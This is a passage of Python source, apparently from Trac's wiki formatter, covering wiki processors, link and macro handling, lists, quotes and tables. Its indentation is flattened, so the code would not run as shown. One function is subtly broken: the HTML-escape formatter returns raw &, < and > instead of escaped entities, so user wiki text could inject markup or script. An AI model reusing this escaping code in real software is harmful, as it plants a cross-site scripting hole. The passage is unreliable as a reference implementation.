'split_url_into_path_query_fragment', 'wiki_to_outline']
def _markup_to_unicode(markup):
if isinstance(markup, Fragment):
return Markup(markup)
elif genshi and isinstance(markup, Stream):
return stream_to_unicode(markup)
else:
return to_unicode(markup)
def system_message(msg, text=None):
return tag.div(tag.strong(msg), text and tag.pre(text),
class_="system-message")
def split_url_into_path_query_fragment(target):
"""Split a target along `?` and `#` in `(path, query, fragment)`.
>>> split_url_into_path_query_fragment('http://path?a=1&b=2#frag?ment')
('http://path', '?a=1&b=2', '#frag?ment')
>>> split_url_into_path_query_fragment('http://path#frag?ment')
('http://path', '', '#frag?ment')
>>> split_url_into_path_query_fragment('http://path?a=1&b=2')
('http://path', '?a=1&b=2', '')
>>> split_url_into_path_query_fragment('http://path')
('http://path', '', '')
"""
query = fragment = ''
idx = target.find('#')
if idx >= 0:
target, fragment = target[:idx], target[idx:]
idx = target.find('?')
if idx >= 0:
target, query = target[:idx], target[idx:]
return target, query, fragment
def concat_path_query_fragment(path, query, fragment=None):
"""Assemble `path`, `query` and `fragment` into a proper URL.
Can be used to re-assemble an URL decomposed using
`split_url_into_path_query_fragment` after modification.
>>> concat_path_query_fragment('/wiki/page', '?version=1')
'/wiki/page?version=1'
>>> concat_path_query_fragment('/wiki/page#a', '?version=1', '#b')
'/wiki/page?version=1#b'
>>> concat_path_query_fragment('/wiki/page?version=1#a', '?format=txt')
'/wiki/page?version=1&format=txt#a'
>>> concat_path_query_fragment('/wiki/page?version=1', '&format=txt')
'/wiki/page?version=1&format=txt'
>>> concat_path_query_fragment('/wiki/page?version=1', 'format=txt')
'/wiki/page?version=1&format=txt'
>>> concat_path_query_fragment('/wiki/page?version=1#a', '?format=txt', '#')
'/wiki/page?version=1&format=txt'
"""
p, q, f = split_url_into_path_query_fragment(path)
if query:
q += ('&' if q else '?') + query.lstrip('?&')
if fragment:
f = fragment
return p + q + ('' if f == '#' else f)
class MacroError(TracError):
"""Exception raised on incorrect macro usage.
The exception is trapped by the wiki formatter and the message is
rendered in a `pre` tag, wrapped in a div with class `system-message`.
:since: 1.0.11
"""
pass
class ProcessorError(TracError):
"""Exception raised on incorrect processor usage.
The exception is trapped by the wiki formatter and the message is
rendered in a `pre` tag, wrapped in a div with class `system-message`.
:since: 0.12
"""
pass
class WikiProcessor(object):
_code_block_re = re.compile('^<div(?:\s+class="([^"]+)")?>(.*)</div>$')
_block_elem_re = re.compile(r'^\s*<(?:div|table)(?:\s+[^>]+)?>',
re.I | re.M)
def __init__(self, formatter, name, args=None):
"""Find the processor by name
:param formatter: the formatter embedding a call for this processor
:param name: the name of the processor
:param args: extra parameters for the processor
(''since 0.11'')
"""
self.formatter = formatter
self.env = formatter.env
self.name = name
self.args = args
self.error = None
self.macro_provider = None
# FIXME: move these tables outside of __init__
builtin_processors = {'html': self._html_processor,
'htmlcomment': self._htmlcomment_processor,
'default': self._default_processor,
'comment': self._comment_processor,
'div': self._div_processor,
'rtl': self._rtl_processor,
'span': self._span_processor,
'Span': self._span_processor,
'td': self._td_processor,
'th': self._th_processor,
'tr': self._tr_processor,
'table': self._table_processor,
}
self.inline_check = {'html': self._html_is_inline,
'htmlcomment': True, 'comment': True,
'span': True, 'Span': True,
}.get(name)
self._sanitizer = TracHTMLSanitizer(
safe_schemes=formatter.wiki.safe_schemes,
safe_origins=formatter.wiki.safe_origins)
self.processor = builtin_processors.get(name)
if not self.processor:
# Find a matching wiki macro
for macro_provider in WikiSystem(self.env).macro_providers:
for macro_name in macro_provider.get_macros() or []:
if self.name == macro_name:
if hasattr(macro_provider, 'expand_macro'):
self.processor = self._macro_processor
else:
raise TracError(
tag_("Pre-0.11 macros with the %(method)s "
"method are no longer supported.",
method=tag.code("render_macro")))
self.macro_provider = macro_provider
self.inline_check = getattr(macro_provider, 'is_inline',
False)
break
if not self.processor:
# Find a matching mimeview renderer
mimeview = Mimeview(formatter.env)
for renderer in mimeview.renderers:
if renderer.get_quality_ratio(self.name) > 1:
self.processor = self._mimeview_processor
break
if not self.processor:
mimetype = mimeview.get_mimetype(self.name)
if mimetype:
self.name = mimetype
self.processor = self._mimeview_processor
if not self.processor:
self.processor = self._default_processor
self.error = _("No macro or processor named '%(name)s' found",
name=name)
# inline checks
def _html_is_inline(self, text):
if text:
tag = text[1:].lstrip()
idx = tag.find(' ')
if idx > -1:
tag = tag[:idx]
return tag.lower() in ('a', 'span', 'bdo', 'img',
'big', 'small', 'font',
'tt', 'i', 'b', 'u', 's', 'strike',
'em', 'strong', 'dfn', 'code', 'q',
'samp', 'kbd', 'var', 'cite', 'abbr',
'acronym', 'sub', 'sup')
# builtin processors
def _comment_processor(self, text):
return ''
def _default_processor(self, text):
if self.args and 'lineno' in self.args:
self.name = \
Mimeview(self.formatter.env).get_mimetype('text/plain')
return self._mimeview_processor(text)
else:
return tag.pre(text, class_="wiki")
def _html_processor(self, text):
if WikiSystem(self.env).render_unsafe_content:
return Markup(text)
try:
return self._sanitizer.sanitize(text)
except HTMLParseError as e:
self.env.log.warning(e)
line = unicode(text).splitlines()[e.lineno - 1].strip()
return system_message(_('HTML parsing error: %(message)s',
message=escape(e.msg)), line)
def _htmlcomment_processor(self, text):
if "--" in text:
return system_message(_('Error: Forbidden character sequence '
'"--" in htmlcomment wiki code block'))
return Markup(u'<!--\n%s-->\n' % text)
def _elt_processor(self, eltname, format_to, text):
# Note: as long as _processor_param_re is not re.UNICODE, **args is OK.
# Also, parse_args is using strict mode when processing [[span(...)]].
elt = getattr(tag, eltname)(**(self.args or {}))
if not WikiSystem(self.env).render_unsafe_content:
sanitized_elt = getattr(tag, eltname)
sanitized_elt.attrib = self._sanitizer.sanitize_attrs(eltname,
elt.attrib)
elt = sanitized_elt
elt.append(format_to(self.env, self.formatter.context, text))
return elt
def _div_processor(self, text):
if not self.args:
self.args = {}
self.args.setdefault('class', 'wikipage')
return self._elt_processor('div', format_to_html, text)
def _rtl_processor(self, text):
if not self.args:
self.args = {}
self.args['class'] = ('rtl ' + self.args.get('class', '')).rstrip()
return self._elt_processor('div', format_to_html, text)
def _span_processor(self, text):
if self.args is None:
args, self.args = parse_args(text, strict=True)
text = ', '.join(args)
return self._elt_processor('span', format_to_oneliner, text)
def _td_processor(self, text):
return self._tablecell_processor('td', text)
def _th_processor(self, text):
return self._tablecell_processor('th', text)
def _tr_processor(self, text):
try:
elt = self._elt_processor('tr', self._format_row, text)
self.formatter.open_table()
return elt
except ProcessorError as e:
return system_message(e)
def _table_processor(self, text):
if not self.args:
self.args = {}
self.args.setdefault('class', 'wiki')
try:
return self._elt_processor('table', self._format_table, text)
except ProcessorError as e:
return system_message(e)
def _tablecell_processor(self, eltname, text):
self.formatter.open_table_row()
return self._elt_processor(eltname, format_to_html, text)
_has_multiple_tables_re = re.compile(r"</table>.*?<table",
re.MULTILINE | re.DOTALL)
_inner_table_re = re.compile(r"""\s*
<table[^>]*>\s*
((?:<tr[^>]*>)?
(.*?)
(?:</tr>)?)\s*
</table>\s*$
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
# Note: the need for "parsing" that crude way the formatted content
# will go away as soon as we have a WikiDOM to manipulate...
def _parse_inner_table(self, text):
if self._has_multiple_tables_re.search(text):
raise ProcessorError(_("!#%(name)s must contain at most one table",
name=self.name))
match = self._inner_table_re.match(text)
if not match:
raise ProcessorError(_("!#%(name)s must contain at least one table"
" cell (and table cells only)",
name=self.name))
return Markup(match.group(1 if self.name == 'table' else 2))
def _format_row(self, env, context, text):
if text:
out = io.StringIO()
Formatter(env, context).format(text, out)
text = self._parse_inner_table(out.getvalue())
return text
def _format_table(self, env, context, text):
if text:
out = io.StringIO()
Formatter(env, context).format(text, out)
text = self._parse_inner_table(out.getvalue())
return text
# generic processors
def _macro_processor(self, text):
self.env.log.debug('Executing Wiki macro %s by provider %s',
self.name, self.macro_provider)
if arity(self.macro_provider.expand_macro) == 4:
return self.macro_provider.expand_macro(self.formatter, self.name,
text, self.args)
else:
return self.macro_provider.expand_macro(self.formatter, self.name,
text)
def _mimeview_processor(self, text):
annotations = []
context = self.formatter.context.child()
args = self.args.copy() if self.args else self.args
if args and 'lineno' in args:
lineno = as_int(args.pop('lineno'), 1, min=1)
context.set_hints(lineno=lineno)
id = str(args.pop('id', '')) or \
self.formatter._unique_anchor('a')
context.set_hints(id=id + '-')
if 'marks' in args:
context.set_hints(marks=args.pop('marks'))
annotations.append('lineno')
if args: # Remaining args are assumed to be lexer options
context.set_hints(lexer_options=args)
return tag.div(class_='wiki-code')(
Mimeview(self.env).render(context, self.name, text,
annotations=annotations))
# TODO: use convert('text/html') instead of render
def process(self, text, in_paragraph=False):
if self.error:
text = system_message(tag_("Error: Failed to load processor "
"%(name)s", name=tag.code(self.name)),
self.error)
else:
text = self.processor(text)
return text or ''
def is_inline(self, text):
if callable(self.inline_check):
return self.inline_check(text)
else:
return self.inline_check
def ensure_inline(self, text, in_paragraph=True):
content_for_span = None
interrupt_paragraph = False
if isinstance(text, Element):
tagname = text.tag.lower()
if tagname == 'div':
class_ = text.attrib.get('class', '')
if class_ and 'code' in class_:
content_for_span = text.children
else:
interrupt_paragraph = True
elif tagname == 'table':
interrupt_paragraph = True
else:
# FIXME: do something smarter for Streams
text = _markup_to_unicode(text)
match = re.match(self._code_block_re, text)
if match:
if match.group(1) and 'code' in match.group(1):
content_for_span = match.group(2)
else:
interrupt_paragraph = True
elif re.match(self._block_elem_re, text):
interrupt_paragraph = True
if content_for_span:
text = tag.span(class_='code-block')(*content_for_span)
elif interrupt_paragraph and in_paragraph:
text = "</p>%s<p>" % _markup_to_unicode(text)
return text
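# Illustration only (not part of the original module): a WikiProcessor is
# normally instantiated by a Formatter when it encounters a processor block
# or macro. Assuming `env` and `context` are a configured Environment and
# RenderingContext, the call sequence looks roughly like:
#
#     formatter = Formatter(env, context)
#     processor = WikiProcessor(formatter, 'div', {'class': 'note'})
#     fragment = processor.process(u"Some wiki text")
#
# process() returns the rendered fragment (or ''), falling back to a
# system message when the named macro or processor cannot be resolved.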
class Formatter(object):
"""Base Wiki formatter.
Parses and formats wiki text, in a given `RenderingContext`.
"""
flavor = 'default'
def __init__(self, env, context):
self.env = env
self.context = context.child()
self.context.set_hints(disable_warnings=True)
self.req = context.req
self.href = context.href
self.resource = context.resource
self.perm = context.perm
self.wiki = WikiSystem(self.env)
self.wikiparser = WikiParser(self.env)
self._anchors = {}
self._open_tags = []
self._safe_schemes = None
if not self.wiki.render_unsafe_content:
self._safe_schemes = set(self.wiki.safe_schemes)
def split_link(self, target):
return split_url_into_path_query_fragment(target)
# -- Pre- IWikiSyntaxProvider rules (Font styles)
_indirect_tags = {
'MM_BOLD': (u'<strong>', u'</strong>'),
'WC_BOLD': (u'<strong>', u'</strong>'),
'MM_ITALIC': (u'<em>', u'</em>'),
'WC_ITALIC': (u'<em>', u'</em>'),
'MM_UNDERLINE': (u'<span class="underline">', u'</span>'),
'MM_STRIKE': (u'<del>', u'</del>'),
'MM_SUBSCRIPT': (u'<sub>', u'</sub>'),
'MM_SUPERSCRIPT': (u'<sup>', u'</sup>'),
}
def _get_open_tag(self, tag):
"""Retrieve opening tag for direct or indirect `tag`."""
if not isinstance(tag, tuple):
tag = self._indirect_tags[tag]
return tag[0]
def _get_close_tag(self, tag):
"""Retrieve closing tag for direct or indirect `tag`."""
if not isinstance(tag, tuple):
tag = self._indirect_tags[tag]
return tag[1]
def tag_open_p(self, tag):
"""Do we currently have any open tag with `tag` as end-tag?"""
return tag in self._open_tags
def flush_tags(self):
while self._open_tags != []:
self.out.write(self._get_close_tag(self._open_tags.pop()))
def open_tag(self, tag_open, tag_close=None):
"""Open an inline style tag.
If `tag_close` is not specified, `tag_open` is an indirect tag (0.12)
"""
if tag_close:
self._open_tags.append((tag_open, tag_close))
else:
self._open_tags.append(tag_open)
tag_open = self._get_open_tag(tag_open)
return tag_open
def close_tag(self, open_tag, close_tag=None):
"""Open a inline style tag.
If `close_tag` is not specified, it's an indirect tag (0.12)
"""
tmp = ''
for i in xrange(len(self._open_tags) - 1, -1, -1):
tag = self._open_tags[i]
tmp += self._get_close_tag(tag)
if (open_tag == tag,
(open_tag, close_tag) == tag)[bool(close_tag)]:
del self._open_tags[i]
for j in xrange(i, len(self._open_tags)):
tmp += self._get_open_tag(self._open_tags[j])
break
return tmp
def _indirect_tag_handler(self, match, tag):
"""Handle binary inline style tags (indirect way, 0.12)"""
if self._list_stack and not self.in_list_item:
self.close_list()
if self.tag_open_p(tag):
return self.close_tag(tag)
else:
return self.open_tag(tag)
def _bolditalic_formatter(self, match, fullmatch):
if self._list_stack and not self.in_list_item:
self.close_list()
bold_open = self.tag_open_p('MM_BOLD')
italic_open = self.tag_open_p('MM_ITALIC')
if bold_open and italic_open:
bold_idx = self._open_tags.index('MM_BOLD')
italic_idx = self._open_tags.index('MM_ITALIC')
if italic_idx < bold_idx:
close_tags = ('MM_BOLD', 'MM_ITALIC')
else:
close_tags = ('MM_ITALIC', 'MM_BOLD')
open_tags = ()
elif bold_open:
close_tags = ('MM_BOLD',)
open_tags = ('MM_ITALIC',)
elif italic_open:
close_tags = ('MM_ITALIC',)
open_tags = ('MM_BOLD',)
else:
close_tags = ()
open_tags = ('MM_BOLD', 'MM_ITALIC')
tmp = []
tmp.extend(self.close_tag(tag) for tag in close_tags)
tmp.extend(self.open_tag(tag) for tag in open_tags)
return ''.join(tmp)
def _bold_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_BOLD')
def _bold_wc_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'WC_BOLD')
def _italic_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_ITALIC')
def _italic_wc_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'WC_ITALIC')
def _underline_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_UNDERLINE')
def _strike_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_STRIKE')
def _subscript_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_SUBSCRIPT')
def _superscript_formatter(self, match, fullmatch):
return self._indirect_tag_handler(match, 'MM_SUPERSCRIPT')
def _inlinecode_formatter(self, match, fullmatch):
return tag.code(fullmatch.group('inline'))
def _inlinecode2_formatter(self, match, fullmatch):
return tag.code(fullmatch.group('inline2'))
# pre-0.12 public API (no longer used by Trac itself but kept for plugins)
def simple_tag_handler(self, match, open_tag, close_tag):
"""Generic handler for simple binary style tags"""
if self.tag_open_p((open_tag, close_tag)):
return self.close_tag(open_tag, close_tag)
else:
self.open_tag(open_tag, close_tag)
return open_tag
# -- Post- IWikiSyntaxProvider rules
# WikiCreole line breaks
def _linebreak_wc_formatter(self, match, fullmatch):
return '<br />'
# E-mails
def _email_formatter(self, match, fullmatch):
from trac.web.chrome import Chrome
omatch = Chrome(self.env).format_emails(self.context, match)
if omatch == match: # not obfuscated, make a link
return self._make_mail_link('mailto:'+match, match)
else:
return omatch
# HTML escape of &, < and >
def _htmlescape_formatter(self, match, fullmatch):
return u"&" if match == "&" \
else u"<" if match == "<" else u">"
# Short form (shref) and long form (lhref) of TracLinks
def _shrefbr_formatter(self, match, fullmatch):
ns = fullmatch.group('snsbr')
target = unquote_label(fullmatch.group('stgtbr'))
match = match[1:-1]
        return u'&lt;%s&gt;' % \
self._make_link(ns, target, match, match, fullmatch)
def _shref_formatter(self, match, fullmatch):
ns = fullmatch.group('sns')
target = unquote_label(fullmatch.group('stgt'))
return self._make_link(ns, target, match, match, fullmatch)
def _lhref_formatter(self, match, fullmatch):
rel = fullmatch.group('rel')
ns = fullmatch.group('lns')
target = unquote_label(fullmatch.group('ltgt'))
label = fullmatch.group('label')
return self._make_lhref_link(match, fullmatch, rel, ns, target, label)
def _make_lhref_link(self, match, fullmatch, rel, ns, target, label):
if not label: # e.g. `[http://target]` or `[wiki:target]`
if target:
if ns and target.startswith('//'): # for `[http://target]`
label = ns + ':' + target # use `http://target`
else: # for `wiki:target`
label = target.lstrip('/') # use only `target`
else: # e.g. `[search:]`
label = ns
else:
label = unquote_label(label)
if rel:
if not label:
label = self.wiki.make_label_from_target(rel)
path, query, fragment = self.split_link(rel)
if path.startswith('//'):
path = '/' + path.lstrip('/')
elif path.startswith('/'):
path = self.href + path
else:
resource = get_relative_resource(self.resource, path)
path = get_resource_url(self.env, resource, self.href)
if resource.id:
target = concat_path_query_fragment(unicode(resource.id),
query, fragment)
if resource.realm == 'wiki':
target = '/' + target # Avoid wiki page scoping
return self._make_link(resource.realm, target, match,
label, fullmatch)
return tag.a(label,
href=concat_path_query_fragment(path, query, fragment))
else:
return self._make_link(ns or 'wiki', target or '', match, label,
fullmatch)
def _make_link(self, ns, target, match, label, fullmatch):
# first check for an alias defined in trac.ini
ns = self.env.config['intertrac'].get(ns, ns)
if ns in self.wikiparser.link_resolvers:
resolver = self.wikiparser.link_resolvers[ns]
if arity(resolver) == 5:
return resolver(self, ns, target, escape(label, False),
fullmatch)
else:
return resolver(self, ns, target, escape(label, False))
elif ns == "mailto":
from trac.web.chrome import Chrome
chrome = Chrome(self.env)
if chrome.never_obfuscate_mailto:
otarget, olabel = target, label
else:
otarget = chrome.format_emails(self.context, target)
olabel = chrome.format_emails(self.context, label)
if (otarget, olabel) == (target, label):
return self._make_mail_link('mailto:'+target, label)
else:
return olabel or otarget
elif target.startswith('//'):
if self._safe_schemes is None or ns in self._safe_schemes:
return self._make_ext_link(ns + ':' + target, label)
else:
return escape(match)
else:
return self._make_intertrac_link(ns, target, label) or \
self._make_interwiki_link(ns, target, label) or \
escape(match)
def _make_intertrac_link(self, ns, target, label):
res = self.get_intertrac_url(ns, target)
if res:
return self._make_ext_link(res[0], label, res[1])
def get_intertrac_url(self, ns, target):
intertrac = self.env.config['intertrac']
url = intertrac.get(ns + '.url')
if not url and ns == 'trac':
url = 'http://trac.edgewall.org'
if url:
name = intertrac.get(ns + '.title', 'Trac project %s' % ns)
url = '%s/intertrac/%s' % (url, unicode_quote(target))
if target:
title = _('%(target)s in %(name)s', target=target, name=name)
else:
title = name
return url, title
def shorthand_intertrac_helper(self, ns, target, label, fullmatch):
if fullmatch: # short form
it_group = fullmatch.groupdict().get('it_' + ns)
if it_group:
alias = it_group.strip()
intertrac = self.env.config['intertrac']
target = '%s:%s' % (ns, target[len(it_group):])
return self._make_intertrac_link(intertrac.get(alias, alias),
target, label) or label
def _make_interwiki_link(self, ns, target, label):
from trac.wiki.interwiki import InterWikiMap
interwiki = InterWikiMap(self.env)
if ns in interwiki:
url, title = interwiki.url(ns, target)
if url:
return self._make_ext_link(url, label, title)
def _make_ext_link(self, url, text, title=''):
local_url = self.env.project_url or self.env.abs_href.base
if not url.startswith(local_url):
return tag.a(tag.span(u'\u200b', class_="icon"), text,
class_="ext-link", href=url, title=title or None)
else:
return tag.a(text, href=url, title=title or None)
def _make_mail_link(self, url, text, title=''):
return tag.a(tag.span(u'\u200b', class_="icon"), text,
class_="mail-link", href=url, title=title or None)
# Anchors
def _anchor_formatter(self, match, fullmatch):
anchor = fullmatch.group('anchorname')
label = fullmatch.group('anchorlabel') or ''
if label:
label = format_to_oneliner(self.env, self.context, label)
return '<span class="wikianchor" id="%s">%s</span>' % (anchor, label)
def _unique_anchor(self, anchor):
i = 1
anchor_base = anchor
while anchor in self._anchors:
anchor = anchor_base + str(i)
i += 1
self._anchors[anchor] = True
return anchor
# WikiMacros or WikiCreole links
def _macrolink_formatter(self, match, fullmatch):
# check for a known [[macro]]
macro_or_link = match[2:-2]
if macro_or_link.startswith('=#'):
fullmatch = WikiParser._set_anchor_wc_re.match(macro_or_link)
if fullmatch:
return self._anchor_formatter(macro_or_link, fullmatch)
fullmatch = WikiParser._macro_re.match(macro_or_link)
if fullmatch:
name = fullmatch.group('macroname')
args = fullmatch.group('macroargs')
macro = False # not a macro
macrolist = name[-1] == '?'
if name.lower() == 'br' or name == '?':
macro = None
else:
macro = WikiProcessor(self, (name, name[:-1])[macrolist])
if macro.error:
macro = False
if macro is not False:
if macrolist:
macro = WikiProcessor(self, 'MacroList')
return self._macro_formatter(match, fullmatch, macro)
fullmatch = WikiParser._creolelink_re.match(macro_or_link)
return self._lhref_formatter(match, fullmatch)
def _macro_formatter(self, match, fullmatch, macro, only_inline=False):
name = fullmatch.group('macroname')
if name and name[-1] == '?': # Macro?() shortcut for MacroList(Macro)
args = name[:-1] or '*'
else:
args = fullmatch.group('macroargs')
if name.lower() == 'br':
return self.emit_linebreak(args)
in_paragraph = not (getattr(self, 'in_list_item', True) or
getattr(self, 'in_table', True) or
getattr(self, 'in_def_list', True))
try:
return macro.ensure_inline(macro.process(args), in_paragraph)
except MacroError as e:
return system_message(_("Macro %(name)s(%(args)s) failed",
name=name, args=args), to_fragment(e))
except Exception as e:
self.env.log.error("Macro %s(%s) failed for %s:%s", name,
args, self.resource,
exception_to_unicode(e, traceback=True))
return system_message(_("Error: Macro %(name)s(%(args)s) failed",
name=name, args=args), to_fragment(e))
def emit_linebreak(self, args):
if args:
sep = ':' if ':' in args else '='
kv = args.split(sep, 1)
if kv[0] == 'clear':
clear = kv[-1] if kv[-1] in ['left', 'right'] else 'both'
return '<br style="clear: {0}" />'.format(clear)
return '<br />'
# Headings
def _parse_heading(self, match, fullmatch, shorten):
match = match.strip()
hdepth = fullmatch.group('hdepth')
depth = len(hdepth)
anchor = fullmatch.group('hanchor') or ''
htext = fullmatch.group('htext').strip()
if htext.endswith(hdepth):
htext = htext[:-depth]
heading = format_to_oneliner(self.env, self.context, htext, False)
if anchor:
anchor = anchor[1:]
else:
sans_markup = plaintext(heading, keeplinebreaks=False)
anchor = WikiParser._anchor_re.sub('', sans_markup)
if not anchor or anchor[0].isdigit() or anchor[0] in '.-':
# an ID must start with a Name-start character in XHTML
anchor = 'a' + anchor # keeping 'a' for backward compat
anchor = self._unique_anchor(anchor)
if shorten:
heading = format_to_oneliner(self.env, self.context, htext, True)
return depth, heading, anchor
def _heading_formatter(self, match, fullmatch):
self.close_table()
self.close_paragraph()
self.close_indentation()
self.close_list()
self.close_def_list()
depth, heading, anchor = self._parse_heading(match, fullmatch, False)
self.out.write(u'<h%d class="section" id="%s">%s</h%d>' %
(depth, anchor, heading, depth))
# Generic indentation (as defined by lists and quotes)
def _set_tab(self, depth):
"""Append a new tab if needed and truncate tabs deeper than `depth`
given: -*-----*--*---*--
setting: *
results in: -*-----*-*-------
"""
tabstops = []
for ts in self._tabstops:
if ts >= depth:
break
tabstops.append(ts)
tabstops.append(depth)
self._tabstops = tabstops
# Lists
def _list_formatter(self, match, fullmatch):
ldepth = len(fullmatch.group('ldepth'))
listid = match[ldepth]
self.in_list_item = True
class_ = start = None
if listid in WikiParser.BULLET_CHARS:
type_ = 'ul'
else:
type_ = 'ol'
lstart = fullmatch.group('lstart')
if listid == 'i':
class_ = 'lowerroman'
elif listid == 'I':
class_ = 'upperroman'
elif listid.isdigit() and lstart != '1':
start = int(lstart)
elif listid.islower():
class_ = 'loweralpha'
if len(lstart) == 1 and lstart != 'a':
start = ord(lstart) - ord('a') + 1
elif listid.isupper():
class_ = 'upperalpha'
if len(lstart) == 1 and lstart != 'A':
start = ord(lstart) - ord('A') + 1
self._set_list_depth(ldepth, type_, class_, start)
return ''
def _get_list_depth(self):
"""Return the space offset associated to the deepest opened list."""
if self._list_stack:
return self._list_stack[-1][1]
return -1
def _set_list_depth(self, depth, new_type=None, lclass=None, start=None):
def open_list():
self.close_table()
self.close_paragraph()
self.close_indentation() # FIXME: why not lists in quotes?
self._list_stack.append((new_type, depth))
self._set_tab(depth)
class_attr = ' class="%s"' % lclass if lclass else ''
start_attr = ' start="%s"' % start if start is not None else ''
self.out.write(u'<' + new_type + class_attr + start_attr + '><li>')
def close_item():
self.flush_tags()
self.out.write(u'</li>')
def close_list(tp):
self._list_stack.pop()
close_item()
self.out.write(u'</%s>' % tp)
# depending on the indent/dedent, open or close lists
if depth > self._get_list_depth():
open_list()
else:
while self._list_stack:
deepest_type, deepest_offset = self._list_stack[-1]
if depth >= deepest_offset:
break
close_list(deepest_type)
if new_type and depth >= 0:
if self._list_stack:
old_type, old_offset = self._list_stack[-1]
if new_type and old_type != new_type:
close_list(old_type)
open_list()
else:
if old_offset != depth: # adjust last depth
self._list_stack[-1] = (old_type, depth)
close_item()
self.out.write(u'<li>')
else:
open_list()
def close_list(self, depth=-1):
self._set_list_depth(depth)
# Definition Lists
def _definition_formatter(self, match, fullmatch):
if self.in_def_list:
tmp = '</dd>'
else:
self.close_paragraph()
tmp = '<dl class="wiki">'
definition = match[:match.find('::')]
tmp += '<dt>%s</dt><dd>' % format_to_oneliner(self.env, self.context,
definition)
self.in_def_list = True
return tmp
def close_def_list(self):
if self.in_def_list:
self.out.write(u'</dd></dl>\n')
self.in_def_list = False
# Blockquote
def _indent_formatter(self, match, fullmatch):
idepth = len(fullmatch.group('idepth'))
if self._list_stack:
ltype, ldepth = self._list_stack[-1]
if idepth < ldepth:
for _, ldepth in self._list_stack:
if idepth > ldepth:
self.in_list_item = True
self._set_list_depth(idepth)
return ''
elif idepth <= ldepth + (3 if ltype == 'ol' else 2):
self.in_list_item = True
return ''
if not self.in_def_list:
self._set_quote_depth(idepth)
return ''
def close_indentation(self):
self._set_quote_depth(0)
def _get_quote_depth(self):
"""Return the space offset associated to the deepest opened quote."""
return self._quote_stack[-1] if self._quote_stack else 0
def _set_quote_depth(self, depth, citation=False):
def open_quote(depth):
self.close_table()
self.close_paragraph()
self.close_list()
def open_one_quote(d):
self._quote_stack.append(d)
self._set_tab(d)
class_attr = ' class="citation"' if citation else ''
self.out.write(u'<blockquote%s>\n' % class_attr)
if citation:
for d in xrange(quote_depth+1, depth+1):
open_one_quote(d)
else:
open_one_quote(depth)
def close_quote():
self.close_table()
self.close_paragraph()
self._quote_stack.pop()
self.out.write(u'</blockquote>\n')
quote_depth = self._get_quote_depth()
if depth > quote_depth:
self._set_tab(depth)
tabstops = self._tabstops[::-1]
while tabstops:
tab = tabstops.pop()
if tab > quote_depth:
open_quote(tab)
else:
while self._quote_stack:
deepest_offset = self._quote_stack[-1]
if depth >= deepest_offset:
break
close_quote()
if not citation and depth > 0:
if self._quote_stack:
old_offset = self._quote_stack[-1]
if old_offset != depth: # adjust last depth
self._quote_stack[-1] = depth
else:
open_quote(depth)
if depth > 0:
self.in_quote = True
# Table
def _table_cell_formatter(self, match, fullmatch):
self.open_table()
self.open_table_row()
self.continue_table = 1
separator = fullmatch.group('table_cell_sep')
is_last = fullmatch.group('table_cell_last')
numpipes = len(separator)
cell = 'td'
if separator[0] == '=':
numpipes -= 1
if separator[-1] == '=':
numpipes -= 1
cell = 'th'
colspan = numpipes / 2
if is_last is not None:
if is_last and is_last[-1] == '\\':
self.continue_table_row = 1
colspan -= 1
if not colspan:
return ''
attrs = ''
if colspan > 1:
attrs = ' colspan="%d"' % int(colspan)
# alignment: ||left || right||default|| default || center ||
after_sep = fullmatch.end('table_cell_sep')
alignleft = after_sep < len(self.line) and self.line[after_sep] != ' '
# lookahead next || (FIXME: this fails on ` || ` inside the cell)
next_sep = re.search(r'([^!])=?\|\|', self.line[after_sep:])
alignright = next_sep and next_sep.group(1) != ' '
textalign = None
if alignleft:
if not alignright:
textalign = 'left'
elif alignright:
textalign = 'right'
elif next_sep: # check for the extra spaces specifying a center align
first_extra = after_sep + 1
last_extra = after_sep + next_sep.start() - 1
if first_extra < last_extra and \
self.line[first_extra] == self.line[last_extra] == ' ':
textalign = 'center'
if textalign:
attrs += ' style="text-align: %s"' % textalign
td = '<%s%s>' % (cell, attrs)
if self.in_table_cell:
td = '</%s>' % self.in_table_cell + td
self.in_table_cell = cell
return td
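    # Worked example (annotation): '||left || right||' opens two <td> cells
    # with left/right alignment, '||= header =||' produces a <th>, and
    # '||||spanned||' (four pipes, colspan = 4 / 2 = 2) emits '<td colspan="2">'.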
def _table_row_sep_formatter(self, match, fullmatch):
self.open_table()
self.close_table_row(force=True)
params = fullmatch.group('table_row_params')
if params:
tr = WikiProcessor(self, 'tr', self.parse_processor_args(params))
processed = _markup_to_unicode(tr.process(''))
params = processed[3:processed.find('>')]
self.open_table_row(params or '')
self.continue_table = 1
self.continue_table_row = 1
def open_table(self):
if not self.in_table:
self.close_paragraph()
self.close_list()
self.close_def_list()
self.in_table = 1
self.out.write(u'<table class="wiki">\n')
def open_table_row(self, params=''):
if not self.in_table_row:
self.open_table()
self.in_table_row = 1
self.out.write(u'<tr%s>' % params)
def close_table_row(self, force=False):
if self.in_table_row and (not self.continue_table_row or force):
self.in_table_row = 0
if self.in_table_cell:
self.out.write(u'</%s>' % self.in_table_cell)
self.in_table_cell = ''
self.out.write(u'</tr>')
self.continue_table_row = 0
def close_table(self):
if self.in_table:
self.close_table_row(force=True)
self.out.write(u'</table>\n')
self.in_table = 0
# Paragraphs
def open_paragraph(self):
if not self.paragraph_open:
self.out.write(u'<p>\n')
self.paragraph_open = 1
def close_paragraph(self):
self.flush_tags()
if self.paragraph_open:
self.out.write(u'</p>\n')
self.paragraph_open = 0
# Code blocks
def parse_processor_args(self, line):
return parse_processor_args(line)
def handle_code_block(self, line, startmatch=None):
if startmatch:
self.in_code_block += 1
if self.in_code_block == 1:
name = startmatch.group(2)
if name:
args = parse_processor_args(line[startmatch.end():])
self.code_processor = WikiProcessor(self, name, args)
else:
self.code_processor = None
self.code_buf = []
self.code_prefix = line[:line.find(WikiParser.STARTBLOCK)]
else:
self.code_buf.append(line)
if not self.code_processor:
self.code_processor = WikiProcessor(self, 'default')
elif line.strip() == WikiParser.ENDBLOCK:
self.in_code_block -= 1
if self.in_code_block == 0 and self.code_processor:
if self.code_processor.name not in ('th', 'td', 'tr'):
self.close_table()
self.close_paragraph()
if self.code_buf:
